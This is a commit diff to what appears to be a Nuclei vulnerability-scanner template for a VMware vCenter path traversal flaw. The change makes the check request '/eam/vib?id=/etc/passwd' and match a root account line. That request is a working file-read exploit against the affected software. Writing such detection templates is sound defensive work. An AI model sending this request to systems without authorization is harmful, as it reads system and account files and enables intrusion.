commit
2f6ceda18f
|
@ -9,15 +9,14 @@ info:
|
|||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-22
|
||||
tags: vmware,lfi,vcenter
|
||||
tags: vmware,lfi,vcenter,linux
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/eam/vib?id=/etc/issue"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "vCenter Server"
|
||||
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
|
||||
|
||||
# Enhanced by mp on 2022/08/01
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
Loading…
Reference in New Issue